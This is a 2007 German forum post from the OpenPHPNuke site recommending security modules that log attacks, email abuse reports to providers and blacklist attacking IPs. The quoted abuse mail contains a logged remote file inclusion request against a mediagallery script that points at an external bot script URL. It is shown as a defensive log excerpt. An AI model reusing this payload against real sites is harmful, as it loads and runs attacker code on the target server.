Autor Gast
Datum 07.12.2007 13:08
Beiträge: Das kenne ich auch sehr gut.

Installiere dir doch mal die Customizer Module "EVA" und "Black Liste".
Konfiguriere das so, dass dir OPN eine Mail sendet wenn jemand (meist ein Bot) dein OPN angreift.

du wirst erstaunt sein, was da alles versucht wird und mit welchen Manipulation die OPN zu hacken versuchen.
Resp. die versuchen mit div. Exploits Schadenscode einzuschleusen.

OPN versendet bei diesen Angriffe dann auch automatisch eine Abuse Mail an der Provider von den Angreiffer.

Ein Auszug aus dieser Mail:

[EVA-ABUSE]



Guten Tag sehr geehrte Damen und Herren,

ihr Server mit der IP

84.77.115.184
84.77.115.184

ist bei dem Versuch Schadenscode einzuschleusen ertappt worden.
Ich bitte dringend um Unterlassung andernfalls folgen weitere rechtliche Schritte.

Als Frist gebe ich Ihnen 24 Stunden. Sollte danach von der selben IP
weitere Angriffe erfasst werden erfolgt eine Strafanzeige.

Technische Informationen und Ausschnitte aus vorhandenen LOG Dateien:

Datum: 07.12.2007 06:03:56

Browser : libwww-perl/5.65
REMOTE_ADDR : 84.77.115.184
REMOTE_PORT : 4346
REQUEST_URI : /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://www.freewebs.com/jaksel/bot/s.txt?


und genau diese Angriffe pushen dann deine Statistik an Zugriffen enorm nach oben.

Blackliste wird auch automatisch ergänzt:

Gesperrte IP's welche die ms-world angreiffen und Schadencode auf den Server zu laden

* 72.10.167.50(2)
* 82.149.231.169(5)
* 66.90.101.9(2)
* 72.29.92.27(2)
* 66.225.253.129(2)
* 80.238.208.61(1)
* 213.203.223.115(1)
* 65.98.41.42(1)
* 144.92.13.94(1)
* 216.117.166.78(2)


Gesperrte IP Adressen (650)

Bei den IP's in Klammern siehst du, wie oft diese IP schon versucht hat OPN anzugreiffen.

Flash




Diese Seite drucken
Diese Seite schließen

Dieser Artikel kommt von: OpenPHPNuke - das Open Source CMS
http://www.openphpnuke.info/